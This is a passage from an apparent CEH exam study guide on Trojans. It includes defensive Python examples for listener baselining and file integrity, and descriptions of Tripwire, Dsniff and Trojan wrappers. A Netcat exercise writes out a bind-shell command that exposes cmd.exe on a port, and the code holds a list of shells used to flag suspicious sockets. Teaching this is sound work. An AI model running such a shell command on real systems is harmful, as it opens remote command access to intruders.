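    ("tcp", 135): "svchost.exe",
    ("tcp", 445): "System",
    ("tcp", 3389): "svchost.exe",
    ("udp", 137): "System",
}
SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash"}   # a shell should not own a socket

ENDPOINTS = [   # constructed, modelled on netstat -ano / TCPView columns
    {"proto": "tcp", "local": "0.0.0.0:135", "remote": "0.0.0.0:0", "state": "LISTENING", "pid": 904, "process": "svchost.exe"},
    {"proto": "tcp", "local": "0.0.0.0:445", "remote": "0.0.0.0:0", "state": "LISTENING", "pid": 4, "process": "System"},
    {"proto": "tcp", "local": "0.0.0.0:3389", "remote": "0.0.0.0:0", "state": "LISTENING", "pid": 1288, "process": "update_helper.exe"},
    {"proto": "tcp", "local": "0.0.0.0:123", "remote": "0.0.0.0:0", "state": "LISTENING", "pid": 3120, "process": "nc.exe"},
    {"proto": "tcp", "local": "192.168.0.5:123", "remote": "192.168.0.9:50212", "state": "ESTABLISHED", "pid": 3121, "process": "cmd.exe"},
    {"proto": "udp", "local": "0.0.0.0:137", "remote": "*:*", "state": "", "pid": 4, "process": "System"},
]


def local_port(endpoint):
    """Port number from an 'address:port' string (works for IPv4 and '*')."""
    return int(endpoint["local"].rsplit(":", 1)[1])


def review(endpoints, expected, shells):
    """Return (kind, port, pid, process) findings for anything off-baseline."""
    findings = []
    for e in endpoints:
        port = local_port(e)
        is_listener = e["state"] == "LISTENING" or e["proto"] == "udp"   # UDP has no state
        if is_listener:
            key = (e["proto"], port)
            if key not in expected:
                findings.append(("unexpected-listener", port, e["pid"], e["process"]))
            elif expected[key] != e["process"]:
                findings.append(("listener-process-mismatch", port, e["pid"], e["process"]))
        if e["process"].lower() in shells:
            findings.append(("shell-owns-endpoint", port, e["pid"], e["process"]))
    return findings


if __name__ == "__main__":
    for finding in review(ENDPOINTS, EXPECTED_LISTENERS, SHELLS):
        print("%-26s port %-5d pid %-5d %s" % finding)
```

The baseline is the valuable part: a listener that is not on the allow list, or one whose owning process differs from the recorded owner, is a lead to investigate even when the port number itself looks ordinary, and the PID is what ties the finding back to the process viewers described above.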

Tripwire verifies system integrity. It automatically calculates cryptographic hashes of all key system files or any file that is to be monitored for modifications. The Tripwire software works by creating a baseline snapshot of the system. It periodically scans those files, recalculates the information, and sees whether any of the information has changed. If there is a change, the software raises an alarm.
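To show the baseline-and-compare idea that Tripwire, Windows File Protection and sfc /scannow share, here is an added Python example; it is not Tripwire's or Microsoft's code. It snapshots SHA-256 digests of a set of monitored files, compares a later snapshot against that baseline to report modified, missing and new files, and restores flagged files only from a known-good cache whose copy matches the baseline digest. The file tree, its contents and the cache are constructed in-memory dictionaries standing in for a real system folder and its dllcache.

```python
"""Baseline-and-compare file integrity checking (added example; not from
Tripwire or Microsoft). Files and the known-good cache are constructed
dictionaries of path -> bytes; the contents are placeholders."""
import hashlib


def digest(data):
    return hashlib.sha256(data).hexdigest()


def make_baseline(files):
    """Snapshot: path -> digest of contents, taken on a known-clean system."""
    return {path: digest(data) for path, data in files.items()}


def compare(baseline, files):
    """Report modified, missing and new files relative to the baseline."""
    current = make_baseline(files)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def restore_from_cache(files, report, cache, baseline):
    """Put back flagged files, but only from a cache copy whose digest matches
    the baseline; a tampered cache therefore cannot be used to 'restore'."""
    restored = []
    for path in report["modified"] + report["missing"]:
        good = cache.get(path)
        if good is not None and digest(good) == baseline[path]:
            files[path] = good
            restored.append(path)
    return sorted(restored)


# Constructed sample system: contents are placeholders, not real binaries.
CLEAN = {
    "system32/kernel32.dll": b"MZ...kernel32 placeholder...",
    "system32/ntdll.dll": b"MZ...ntdll placeholder...",
    "system32/drivers/etc/hosts": b"127.0.0.1 localhost\n",
}
CACHE = dict(CLEAN)                  # stands in for the dllcache folder


def tampered_snapshot():
    """Constructed later state: one file replaced, one removed, one new."""
    files = dict(CLEAN)
    files["system32/kernel32.dll"] = b"MZ...replaced by something else..."
    del files["system32/ntdll.dll"]
    files["system32/unknown_new.dll"] = b"MZ...unexpected file..."
    return files


def demo():
    """Baseline, detect, restore, re-check; returns the three results."""
    baseline = make_baseline(CLEAN)
    files = tampered_snapshot()
    before = compare(baseline, files)
    restored = restore_from_cache(files, before, CACHE, baseline)
    after = compare(baseline, files)
    return before, restored, after


if __name__ == "__main__":
    before, restored, after = demo()
    print("before restore:", before)
    print("restored:      ", restored)
    print("after restore: ", after)
```

Two points the code makes explicit: the baseline and the cache must be taken while the system is known to be clean and then kept where an intruder cannot rewrite them, because the check is only as trustworthy as the digests it compares against; and a new file is reported but never "restored", since there is nothing to restore it to, so it has to be examined by hand.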

Dsniff is a collection of tools used for network auditing and penetration testing. Dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and WebSpy passively monitor a network for interesting data such as passwords, email, and file transfers. Arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker due to Layer 2 switching. Sshmitm and webmitm implement active man-in-the-middle attacks against redirected Secure Shell (SSH) and HTTP Over SSL (HTTPS) sessions by exploiting weak bindings in ad hoc Public Key Infrastructure (PKI).

Netcat is a Trojan that uses a command-line interface to open TCP or UDP ports on a target system. A hacker can then telnet to those open ports and gain shell access to the target system. Exercise 1 shows you how to use Netcat.

Note

For the CEH exam, it's important to know how to use Netcat. Make sure you download the Netcat tool and practice the commands before attempting the exam.

Exercise 1: Using Netcat

Download a version of Netcat for your system. There are many versions of Netcat for all Windows OSs. Also, Netcat was originally developed for the Unix system and is available in many Linux distributions, including BackTrack.

Netcat needs to run on both a client and the server. The server side of the connection is enabled by the -l option and is used to create a listener port. For example, use the following command to enable the Netcat listener on the server:

nc -L -p 123 -t -e cmd.exe

On the Netcat client, run the following command to connect to the Netcat listener on the server:

nc <ip address of the server> <listening port on the server>

The client should then have a command prompt shell open from the server.

Unusual system behavior is usually an indication of a Trojan attack. Actions such as programs starting and running without the user's initiation; CD-ROM drawers opening or closing; wallpaper, background, or screen saver settings changing by themselves; the screen display flipping upside down; and a browser program opening strange or unexpected websites are all indications of a Trojan attack. Any action that is suspicious or not initiated by the user can be an indication of a Trojan attack.

Real World Scenario: Indications of a Virus or Trojan Infection

Carrie was using her computer at work and noticed that her computer seemed to be running slowly. When she tried to open files in Microsoft Word, her system would give an error message and then she was unable to use certain functions in the program. She had not received any new email messages in the last 24 hours; she usually received 50 or so messages per day, so this seemed a bit unusual. Lastly, a client of hers had said he received duplicate emails from her last week, which seemed odd.

So, Carrie called John, the company network administrator, and asked him to look at her computer to determine what was causing the computer slowdown and other issues with Microsoft Outlook. John looked at Carrie's computer and noticed that the virus definitions were 6 months old. The antivirus program kept popping up with windows indicating that the virus definitions were out of date, but Carrie just ignored them and kept closing the pop-up windows. John updated the antivirus definitions and ran a full system scan. The antivirus program determined that the system had been infected with 114 viruses and Trojans. The antivirus program was able to clean the infections and restore the computer to its previous uninfected state. John was testing Microsoft Outlook to ensure that it was indeed working when he noticed several emails from online horoscope services, entertainment websites, and online gaming websites. John removed several questionable programs from her computer. Apparently, Carrie did not realize that these types of downloads could cause harm to her computer.

Network software to push virus updates to all workstations, network controls to prevent installation of unauthorized software, and user security awareness training could have prevented this incident from occurring.

Wrappers are software packages that can be used to deliver a Trojan. The wrapper binds a legitimate file to the Trojan file. Both the legitimate software and the Trojan are combined into a single executable file and installed when the program is run.

Generally, games or other animated installations are used as wrappers because they entertain the user while the Trojan is being installed. This way, the user doesn't notice the slower processing that occurs while the Trojan is being installed on the system; the user only sees the legitimate application being installed.

Hacking Tools

Graffiti is an animated game that can be wrapped with a Trojan. It entertains the user with an animated game while the Trojan is being installed in the background.

Silk Rope 2000 is a wrapper that combines the BackOrifice server and any other specified application.

ELiTeWrap is an advanced EXE wrapper for Windows used for installing and running programs. ELiTeWrap can create a setup program to extract files to a directory and execute programs or batch files that display help menus or copy files on to the target system.

Icon Converter Plus is a conversion program that translates icons between various formats. An attacker can use this type of application to disguise malicious code or a Trojan so that users are tricked into executing it, thinking it is a legitimate application.